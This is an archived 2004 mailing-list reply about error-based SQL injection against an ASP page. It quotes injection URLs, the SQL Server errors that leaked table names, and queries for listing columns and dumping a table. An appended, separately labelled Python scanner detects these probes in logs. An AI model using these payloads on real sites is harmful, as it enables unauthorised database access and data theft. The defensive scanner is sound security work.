WebApp Sec mailing list archives

Re: SQL Injection data retrieving??


From: Jonathan Angliss <jon () netdork net>
Date: Fri, 10 Sep 2004 14:31:11 -0500

Hi Roland,

Friday, September 10, 2004, 7:06:56 AM, you wrote:
> First I've sent this URL:
>
> www.mysite.com/products.asp?id=convert(int,(select top 1 name
> from sysobjects where xtype='u' order by asc))
>
> And I've got the following error:
>
> Error Type:
> Microsoft OLE DB Provider for SQL Server (0x80040E07)
> Syntax error converting the nvarchar value '__big_field' to a column of data type int.
> /products.asp, line 32

You got that error because name is described as type sysname, which
according to that error is a type of nvarchar. Unless it's obviously a
numeric in a string, using convert will fail, for example:

  convert(int, '123')

That'll work

  convert(int , 'abc')

That'll fail. Unless getting it to generate such an error is part of
your plan.

> I assume that "__big_field" is the name of the database? Right?

I believe that's a table name, not a database name.  I believe the
database names are stored under the master database in a table called
sysdatabases.

> Secondly I've sent the following URL in order to get the table name:
>
> www.mysite.com/products.asp?id=convert(int,(select top 1 name
> from sysobjects where xtype='u' and name>'__big_field' order by 1
> asc))
>
> Error Type:
> Microsoft OLE DB Provider for SQL Server (0x80040E07)
> Syntax error converting the nvarchar value '__dellist' to a column of data type int.
> /products.asp, line 32

Again, you're attempting to convert an nvarchar to an integer.

> So "__dellist" is a table from the "__big_field" database? Right?

No, just another table in the same database, your where clause is
telling the query to ignore the table __big_field, so it just grabs
the next one down.

> Now here comes the troubles... I would like to retrieve the
> columns name of the "__dellist" table and the data of the
> "__dellist".

select id from sysobjects where name = '__dellist'

That'll get you the table id.  Then:

select name from syscolumns where id = [id from above query]

That'll get you the column names.  Or you can use a single query:

select c.name from syscolumns as c inner join sysobjects as o on o.id = c.id where o.name = '__dellist'

> I've sent:
>
> www.mysite.com/products.asp?id=convert(int,(select * from __dellist where 1=1))
>
> Error Type:
> Microsoft OLE DB Provider for SQL Server (0x80004005)
> Subquery returned more than 1 value. This is not permitted when
> the subquery follows =, !=, <, <= , >, >= or when the subquery is
> used as an expression.
> /products.asp, line 32

You're issuing a convert on a number of fields, I don't think SQL
likes that very much.

> My question is: Which query should I send in order to retrieve the data of the table??

select * from __dellist

The problem is, if the script isn't designed to handle the output from
__dellist, it might not be of any use doing half of this as you cannot
see the output, though the page might generate a bunch of errors.

-- 
Jonathan Angliss
(jon () netdork net)

I before E except after C, huh? Weird.....

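As an added example from the defender's side, not part of this thread or anyone's reply in it: a small Python scanner that flags the error-based convert(int,(select ...)) probes quoted above in IIS-style request logs and pulls the disclosed value out of the OLE DB error text, so an operator can see what the error page gave away. The log lines are constructed and the field layout (date, time, client IP, method, URI stem, query, status) is an assumption about the log format.

```python
import re
from urllib.parse import unquote_plus

# Error-based probe from the thread: CONVERT(int, (SELECT ...)) forcing a type
# conversion error, plus the SQL Server catalogue tables the probes walk.
CONVERT_SUBQUERY = re.compile(r"convert\s*\(\s*int\s*,\s*\(?\s*select\b", re.IGNORECASE)
CATALOGUE_TABLES = re.compile(r"\b(sysobjects|syscolumns|sysdatabases)\b", re.IGNORECASE)
# The OLE DB error text that carries the disclosed value back to the client.
LEAK_ERROR = re.compile(r"converting the nvarchar value '([^']*)' to a column of data type int")

# Constructed IIS W3C-style lines: date time c-ip method uri-stem uri-query sc-status
SAMPLE_LOG = """\
2004-09-10 13:06:56 10.0.0.5 GET /products.asp id=42 200
2004-09-10 13:07:10 10.0.0.5 GET /products.asp id=convert(int,(select+top+1+name+from+sysobjects+where+xtype=%27u%27+order+by+1+asc)) 500
2004-09-10 13:08:02 10.0.0.5 GET /products.asp id=convert(int,(select+c.name+from+syscolumns+as+c+inner+join+sysobjects+as+o+on+o.id=c.id+where+o.name=%27__dellist%27)) 500
2004-09-10 13:09:30 10.0.0.9 GET /products.asp id=17 200
"""

def classify_query(raw_query):
    """Return the reasons a URL-encoded query string looks like an error-based probe."""
    query = unquote_plus(raw_query)  # '+' and %27 become the characters the DB saw
    reasons = []
    if CONVERT_SUBQUERY.search(query):
        reasons.append("convert(int, (select ...)) type-coercion probe")
    tables = sorted({t.lower() for t in CATALOGUE_TABLES.findall(query)})
    if tables:
        reasons.append("catalogue table reference: " + ", ".join(tables))
    return reasons

def scan_log(text):
    """Return (client_ip, uri_stem, status, reasons) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7 or line.startswith("#"):
            continue  # skip blank, short or #-directive lines
        _date, _time, ip, _method, stem, query, status = fields[:7]
        reasons = classify_query(query)
        if reasons:
            hits.append((ip, stem, int(status), reasons))
    return hits

def leaked_value(error_text):
    """Return the value an OLE DB conversion error disclosed, or None if nothing leaked."""
    m = LEAK_ERROR.search(error_text)
    return m.group(1) if m else None

if __name__ == "__main__":
    for ip, stem, status, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {stem} -> HTTP {status}: {'; '.join(reasons)}")
```

The leaked_value() helper run over the server's error log shows which identifiers the verbose error page handed out; returning a generic error page instead of the raw OLE DB message closes that channel.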